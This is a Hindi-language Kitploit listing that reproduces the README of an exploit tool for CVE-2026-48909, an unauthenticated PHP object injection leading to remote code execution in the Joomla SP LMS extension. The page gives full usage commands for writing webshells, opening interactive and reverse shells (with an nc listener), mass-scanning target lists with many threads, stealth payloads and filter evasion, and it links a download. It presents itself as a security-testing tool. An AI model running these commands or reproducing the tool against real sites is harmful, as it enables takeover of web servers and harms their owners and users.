Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Joomla SP LMS एक्सटेंशन संस्करण <= 4.1.3 के लिए बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन से RCE शोषण। lmsOrders कुकी डीसेरिएलाइज़ेशन का फायदा उठाकर Joomla FormattedtextLogger गैजेट श्रृंखला के माध्यम से वेबशेल लिखता है। इंटरैक्टिव शेल, पथ खोज और सफाई शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
भेद्यता विश्लेषणकोड विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

रिपॉजिटरी देखें
2152 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-48909 - Joomla SP LMS एक्सटेंशन संस्करण <= 4.1.3 के लिए बिना प्रमाणीकरण PHP ऑब्जेक्ट इंजेक्शन से RCE शोषण। lmsOrders कुकी डीसेरिएलाइज़ेशन का फायदा उठाकर Joomla FormattedtextLogger गैजेट श्रृंखला के माध्यम से वेबशेल लिखता है। इंटरैक्टिव शेल, पथ खोज और सफाई शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

CVE-2026-48909

Joomla SP LMS — अनधिकृत PHP ऑब्जेक्ट इंजेक्शन → RCE

Python Version CVSS License Platform

CVE-2026-48909 के लिए प्रूफ-ऑफ-कॉन्सेप्ट मूल्यांकन उपकरण
लेखक: सुदीपा वानीगरथना

joomla1

[!IMPORTANT] केवल अधिकृत उपयोग। यह उपकरण सुरक्षा अनुसंधान, शिक्षा, और उन सिस्टमों के परीक्षण के लिए है जिनके आप स्वामी हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेता है।


विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • विशेषताएं
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग मार्गदर्शिका
  • कमांड संदर्भ
  • पेलोड प्रकार
  • हमला श्रृंखला
  • आउटपुट उदाहरण
  • समस्या निवारण
  • भंडार लेआउट
  • संस्करण इतिहास
  • अस्वीकरण
  • लेखक

अवलोकन

CVE-2026-48909 Joomla SP LMS एक्सटेंशन में एक गंभीर अनधिकृत PHP ऑब्जेक्ट इंजेक्शन है। यह उपकरण पूर्ण हमला श्रृंखला को लागू करता है ताकि सुरक्षा पेशेवर प्रयोगशाला या अधिकृत वातावरण में प्रभाव को मान्य कर सकें।

यह डिटेक्शन, पथ खोज, पेलोड वितरण, इंटरैक्टिव पोस्ट-एक्सप्लॉइटेशन (जहां अनुमति हो), सामूहिक मूल्यांकन, और वैकल्पिक सफाई को कवर करता है।


भेद्यता विवरण

गुणमान
CVE IDCVE-2026-48909
CVSS9.5 (गंभीर)
हमला वेक्टरनेटवर्क - अनधिकृत
प्रभावरिमोट कोड निष्पादन
प्रभावित उत्पादJoomla SP LMS
प्रभावित संस्करण1.0.0 – 4.1.3
पैच किया गया संस्करणSP LMS 4.1.4+
गैजेट श्रृंखलाJoomla < 5.2.2 आवश्यक

संगतता मैट्रिक्स

घटकसंस्करणRCE
SP LMS< 4.1.4असुरक्षित
SP LMS≥ 4.1.4पैच किया गया
Joomla< 5.2.2गैजेट श्रृंखला उपयोग योग्य
Joomla≥ 5.2.2गैजेट श्रृंखला पैच किया गया

विशेषताएं

मुख्य

क्षमताविवरण
अनधिकृत शोषणकोई क्रेडेंशियल आवश्यक नहीं
एकाधिक पेलोड7 वेबशेल / निष्पादन वेरिएंट
इंटरैक्टिव शेलतैनाती के बाद कमांड इतिहास सत्र
पथ खोजस्वचालित लेखन योग्य पथ जांच
सफाईपरीक्षण के बाद तैनात वेबशेल हटाएं

मूल्यांकन और संचालन

क्षमताविवरण
सामूहिक स्कैनिंगबहु-थ्रेडेड लक्ष्य सूचियां (1000+)
प्रॉक्सी समर्थनHTTP/SOCKS (Burp, ZAP, आदि)
रिवर्स शेललिसनर-आधारित पेलोड
स्टील्थ मोडहेडर / POST-उन्मुख कमांड चैनल
रैंडमाइज़ेशनUUID शेल नाम, User-Agent रोटेशन
रिपोर्टिंगJSON, HTML, या CSV के रूप में निर्यात
डिटेक्शन सहायताJoomla संस्करण जांच, --check-only, --safe-mode

एवेज़न नोट्स

  • जहां संभव हो Joomla के cmd फ़िल्टर द्वारा अवरुद्ध वर्णों से बचता है
  • बेस64 पैडिंग / स्लैश समस्याओं को कम करने के लिए हेक्स-एन्कोडेड PHP लेखन पथ
  • कॉन्फ़िगरेबल विलंब और घूर्णनशील User-Agents
  • कई इंजेक्शन / पथ उम्मीदवारों में पुनः प्रयास तर्क

स्थापना

आवश्यक शर्तें

  • Python 3.6+
  • pip
  • परीक्षण के तहत लक्ष्य(ओं) तक नेटवर्क पहुंच

सेटअप

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

निर्भरताएं

requests>=2.31.0
urllib3>=2.0.0

argparse Python मानक पुस्तकालय के साथ आता है; इसे pip के माध्यम से स्थापित करने की आवश्यकता नहीं है।


त्वरित प्रारंभ

https://target.example को केवल प्रयोगशाला या अधिकृत लक्ष्य से बदलें।

एकल लक्ष्य — पथ खोजें + इंटरैक्टिव शेल

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

सुरक्षित जाँच (कोई शोषण नहीं)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

सामूहिक स्कैन

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

रिवर्स शेल (अधिकृत प्रयोगशाला)

# लिसनर
nc -lvnp 4444

# शोषण होस्ट
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

उपयोग मार्गदर्शिका

पथ खोज

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

ज्ञात लेखन योग्य पथ

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

इंटरैक्टिव सत्र

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

एक-शॉट कमांड

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

स्टील्थ पेलोड + इंटरैक्टिव

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

प्रॉक्सी (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

सफाई

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

लक्ष्य सूची प्रारूप

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

कमांड संदर्भ

लक्ष्य

तर्कविवरण
targetएकल लक्ष्य URL
--targets, -T FILEलक्ष्यों की फ़ाइल (प्रति पंक्ति एक URL)
--path PATHवेबशेल के लिए पूर्ण सर्वर पथ
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEवेबशेल फ़ाइल नाम (डिफ़ॉल्ट: x.php)

नेटवर्क

तर्कविवरण
--timeout SECONDSअनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--insecureTLS प्रमाणपत्र सत्यापन छोड़ें
--proxy URLउदा. http://127.0.0.1:8080
--random-uaUser-Agent घुमाएं (डिफ़ॉल्ट रूप से सक्षम)
--delay SECONDSअनुरोधों के बीच देरी

रिवर्स शेल

तर्कविवरण
--reverse-host HOSTलिसनर होस्ट
--reverse-port PORTलिसनर पोर्ट

मोड

तर्कविवरण
--interactive, -iतैनाती के बाद इंटरैक्टिव शेल
--check-onlyकेवल भेद्यता जांच
--safe-modeगैर-विनाशकारी परीक्षण
--find-pathस्वचालित रूप से लेखन योग्य पथ खोजें
--cmd COMMANDएक कमांड चलाएं और बाहर निकलें
--cleanup PATHपथ पर वेबशेल हटाएं
--cleanup-afterशोषण के बाद सफाई

सामूहिक स्कैन / रिपोर्ट

तर्कविवरण
--threads NUMकार्यकर्ता थ्रेड (डिफ़ॉल्ट: 10)
--export FILEपरिणामों के लिए आउटपुट पथ
--export-format FORMATjson, html, csv (डिफ़ॉल्ट: json)

लॉगिंग

तर्कविवरण
--log-file FILEलॉग फ़ाइल में लिखें
--quiet, -qशांत मोड
--verbose, -vविस्तृत आउटपुट
--no-bannerबैनर छुपाएं

पेलोड प्रकार

टूल डाउनलोड करें